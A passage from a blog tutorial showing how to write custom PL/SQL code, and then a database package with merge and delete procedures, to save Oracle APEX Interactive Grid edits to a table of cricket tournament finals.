                -- Note that, although DATE_PLAYED is a DATE field, the bind variable
                -- contains a string so we need to handle the conversion to a date here
                update finals
                set date_played = nvl(to_date(:DATE_PLAYED, sys_context('userenv', 'nls_date_format')), date_played),
                    venue = nvl(:VENUE, venue),
                    winning_tcid = nvl(l_win_tcid, winning_tcid),
                    losing_tcid = nvl(l_ru_tcid, losing_tcid),
                    winning_margin = nvl(:WINNING_MARGIN, winning_margin)
                where tournament_year = :TOURNAMENT_YEAR;
            
            elsif :APEX$ROW_STATUS = 'C' then
                -- CREATE (INSERT) as new record
                -- We need to return the Primary Key of the new record as APEX will
                -- use it to refresh the IG display and show the newly created row
                insert into finals( tournament_year, date_played, venue, 
                    winning_tcid, losing_tcid, winning_margin)
                values( :TOURNAMENT_YEAR, to_date(:DATE_PLAYED, sys_context('userenv', 'nls_date_format')), :VENUE,
                    l_win_tcid, l_ru_tcid, :WINNING_MARGIN)
                returning tournament_year into :TOURNAMENT_YEAR;
            end if;
        end if;
    end;
    

    The main points to note are :

    • The possible values of APEX$ROW_STATUS
    • the bind variables for the IG column values return a string, hence the explicit date conversion of :DATE_PLAYED
    • when the insert code generates a new primary key value (e.g. an ID taken from a sequence), APEX needs to know what it is so that it can display the new record once processing is completed.

    On that last point, I believe that we may not need to return the PK value in this case because we’re already providing it explicitly in the UI. I’ve left it here as an illustration that this may be the case in other circumstances.

    Anyhow, let’s give this a test.
    First of all, we’re going to update the 1992 record with the venue :

    The record for 1997 is wrong. The Tournament actually took place in 1996, so we’ll create a corrected record and delete the incorrect one :

    In both cases, we get a success message :

    …and if we check in the database, we can see that the DML has worked as expected :

    NOTE : for any cricketing pedants reading – yes, I know that Sri Lanka won by 7 wickets, not 8. I’ll be correcting this when I “notice it” in a few paragraphs time.

    At this point you may be less than thrilled at the prospect of having to maintain large chunks of PL/SQL in your APEX application.
    Luckily for you, as the process code is a PL/SQL block, you can do pretty much anything you like…

    Calling Stored Program Units from our APEX process

    I’ve created a database package to handle DML operations on the FINALS table :

    create or replace package edit_finals as
    
        procedure save_final( 
            i_year in finals.tournament_year%type, 
            i_date in finals.date_played%type,
            i_venue in finals.venue%type default null,
            i_winners in teams.team_name%type default null,
            i_losers in teams.team_name%type default null,
            i_margin in finals.winning_margin%type default null,
            o_year out finals.tournament_year%type);
    
        procedure delete_final( i_year in finals.tournament_year%type);
    end edit_finals;
    /
    
    create or replace package body edit_finals as
    
        function get_team_cid( i_team in teams.team_name%type)
            return teams.cid%type 
        is 
            rtn_cid teams.cid%type;
        begin
            select cid 
            into rtn_cid
            from teams 
            where team_name = upper( i_team);
    
            return rtn_cid;
        end get_team_cid;
    
        procedure save_final( 
            i_year in finals.tournament_year%type, 
            i_date in finals.date_played%type,
            i_venue in finals.venue%type default null,
            i_winners in teams.team_name%type default null,
            i_losers in teams.team_name%type default null,
            i_margin in finals.winning_margin%type default null,
            o_year out finals.tournament_year%type)
        is 
            win_tcid teams.cid%type := null;
            ru_tcid teams.cid%type := null;
        begin
            if i_winners is not null then 
                win_tcid := get_team_cid( i_winners);
            end if;
    
            if i_losers is not null then 
                ru_tcid := get_team_cid( i_losers);
            end if;
    
            merge into finals 
                using dual 
                on ( tournament_year = i_year)
            when matched then update
                set date_played = nvl(i_date, date_played),
                    venue = nvl(i_venue, venue),
                    winning_tcid = nvl(win_tcid, winning_tcid),
                    losing_tcid = nvl(ru_tcid, losing_tcid),
                    winning_margin = nvl(i_margin, winning_margin)
                where tournament_year = i_year
            when not matched then 
                insert( tournament_year, date_played, venue, winning_tcid, losing_tcid, winning_margin)
                values( i_year, i_date, i_venue, win_tcid, ru_tcid, i_margin);
    
            o_year := i_year;
        end save_final;
    
        procedure delete_final( i_year in finals.tournament_year%type) is 
        begin
            delete from finals
            where tournament_year = i_year;
        end delete_final;
    end edit_finals;
    /
    

    This means that the PL/SQL code for the Save IG Process is a bit more compact :

    begin
        if :APEX$ROW_STATUS = 'D' then
            edit_finals.delete_final(i_year => :TOURNAMENT_YEAR);
        elsif :APEX$ROW_STATUS in ('C', 'U') then
            edit_finals.save_final( 
               i_year => :TOURNAMENT_YEAR, 
               i_date => to_date(:DATE_PLAYED, sys_context('userenv', 'nls_date_format')),
               i_venue => :VENUE,
               i_winners => :WINNERS,
               i_losers => :RUNNERS_UP,
               i_margin => :WINNING_MARGIN,
               o_year => :TOURNAMENT_YEAR);
       end if;
    end;
    

    The behaviour is the same…

    …which we can confirm in the database…

    The benefit of this approach is that, if you decide to migrate from APEX to another front-end technology, the Package is there in the database and does not need to change.

    References

    I’ve not managed to find too much else out there on this topic, hence this post.
    There is a very good forum post by Patrick Wolf.
    This Oracle Tips and Tricks article may be worth a read.
    Finally, there’s this rather comprehensive look at Interactive Grids by John Snyders.

    Pages